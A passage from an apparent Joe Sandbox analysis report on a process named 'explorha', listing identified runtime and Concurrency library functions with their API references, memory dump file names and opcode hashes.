                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EqualOffsetTypeids
                                                                                                      • String ID:
                                                                                                      • API String ID: 1707706676-0
                                                                                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction ID: d46a8b5419ea6fef3d0aaf15578c9bae5f7cc0d8681612a30ff24cfbbcf00fb7
                                                                                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction Fuzzy Hash: 2451A935A042199FDF11EFA8C9806AEBBF1FF15314F18449AE841E7351E732A919CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088F1C0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088F1F4
                                                                                                        • Part of subcall function 0088A5BF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0088A5E0
                                                                                                      • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0088F253
                                                                                                      • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0088F279
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088F2E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                      • String ID:
                                                                                                      • API String ID: 1091748018-0
                                                                                                      • Opcode ID: 0feeb4aecd5b0acf58e6c1cda1afeed1ae6c7cb534fbf592347b50146509e8be
                                                                                                      • Instruction ID: ecbd141d0469d836a5cae41e1a5caf8ec26e97e8c51a021889388126bb8e0fee
                                                                                                      • Opcode Fuzzy Hash: 0feeb4aecd5b0acf58e6c1cda1afeed1ae6c7cb534fbf592347b50146509e8be
                                                                                                      • Instruction Fuzzy Hash: CA41F674600214ABCF19BB68C896BADBB65FF49710F1440A9E606DB387CF709D05CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00886D3F Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00886D82
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00886DB6
                                                                                                      • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00886E1B
                                                                                                      • SafeRWList.LIBCONCRT ref: 00886E2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                      • String ID:
                                                                                                      • API String ID: 893951542-0
                                                                                                      • Opcode ID: 6c1222fd1163190d63c2a138a7cfab992953a76497e3377dd3f4769521aaf15f
                                                                                                      • Instruction ID: b57c99eaaebf076bc7e16168fa60922f806d4f99f51709e3d153488c0d49eaee
                                                                                                      • Opcode Fuzzy Hash: 6c1222fd1163190d63c2a138a7cfab992953a76497e3377dd3f4769521aaf15f
                                                                                                      • Instruction Fuzzy Hash: A931F2367002149FDB09AB24CC81AADB7A6FFC9710F1846B9E909DF385DF31AD148B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088438C Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0088439F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3433162309-0
                                                                                                      • Opcode ID: 3cea40c1aae7277eaa9d90d0d43b2c48d462ff9814dc8a6957b556729f15f93e
                                                                                                      • Instruction ID: 0ce47192b093780f4263f82b59ee27ff16f29b81152cb79be1dc5bf7cada99bc
                                                                                                      • Opcode Fuzzy Hash: 3cea40c1aae7277eaa9d90d0d43b2c48d462ff9814dc8a6957b556729f15f93e
                                                                                                      • Instruction Fuzzy Hash: AA315A76A0130ADFCF10EF94C4C0BAEBBB9FB44304F1414AAD945AB346D730AA05DBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00892A82 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00892A89
                                                                                                      • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00892AD4
                                                                                                      • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00892B07
                                                                                                      • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00892BB7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 2092016602-0
                                                                                                      • Opcode ID: 1b701811f8a6d109afa2d241cad521535b0a019f424d832ee6069cb1d21aa6c6
                                                                                                      • Instruction ID: c41479f658eedb6ea898b14f656986a4adc5657fa5513ce2d47fc156230c8be6
                                                                                                      • Opcode Fuzzy Hash: 1b701811f8a6d109afa2d241cad521535b0a019f424d832ee6069cb1d21aa6c6
                                                                                                      • Instruction Fuzzy Hash: 38315D71A00615AFCF18EF68C4919ADFBF6FF48310B18826DE415E7381DB34A941CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088B325 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0088B32C
                                                                                                      • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 0088B378
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0088B38E
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0088B3FA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
